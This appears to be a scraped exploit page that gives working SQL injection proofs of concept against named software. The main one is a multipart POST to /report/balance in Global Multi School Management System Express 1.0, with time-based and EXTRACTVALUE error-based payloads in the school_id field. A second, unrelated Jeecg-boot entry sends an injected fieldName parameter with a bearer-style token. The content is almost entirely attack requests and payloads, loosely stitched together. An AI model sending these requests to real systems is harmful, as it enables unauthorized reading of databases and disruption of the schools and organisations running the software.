    # Exploit Title:  Global - Multi School Management System Express v1.0- SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###POST /report/balance HTTP/1.1Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcwAccept: */*X-Requested-With: XMLHttpRequestReferer: http://localhostCookie: gmsms=b8d36491f08934ac621b6bc7170eaef18290469fContent-Length: 472Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive------------YWJkMTQzNDcwContent-Disposition: form-data; name="school_id"0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z------------YWJkMTQzNDcwContent-Disposition: form-data; name="academic_year_id"------------YWJkMTQzNDcwContent-Disposition: form-data; name="group_by"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_from"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_to"------------YWJkMTQzNDcw--### Parameter & Payloads ###Parameter: MULTIPART school_id ((custom) POST)Type: error-basedTitle: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BYclause (EXTRACTVALUE)Payload: ------------YWJkMTQzNDcwContent-Disposition: form-data; name="school_id"0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' ANDEXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT(ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx------------YWJkMTQzNDcwContent-Disposition: form-data; name="academic_year_id"------------YWJkMTQzNDcwContent-Disposition: form-data; name="group_by"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_from"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_to"------------YWJkMTQzNDcw–

Global Multi School Management System Express 1.0 SQL Injection

SQL injection vulnerability in Jeecg-boot v.3.5.0 and before allows a local attacker to cause a denial of service via the Benchmark, PG_Sleep, DBMS_Lock.Sleep, Waitfor, DECODE, and DBMS_PIPE.RECEIVE_MESSAGE functions.

    GET /jeecg-boot/sys/duplicate/check?tableName=v3_hello&fieldName=1+and%09if(user(%20)='root@localhost',sleep(0),sleep(0))&fieldVal=1&dataId=asd HTTP/1.1
    Host: 127.0.0.1:8080
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    X_ACCESS_TOKEN: eyJ0eXAi0iJKV1QiLCJhbGci0iJIUzI1Ni J9.eyJleHAi0jE2NzA2NjUy0TQsInVzZXJ uYW1lIjoiYWRtaW4i fQ.bL0e7k3rbFEewdMoL2YfPCo9rtzx7g9 KLjB2LK-J9SU

Tag

#webkit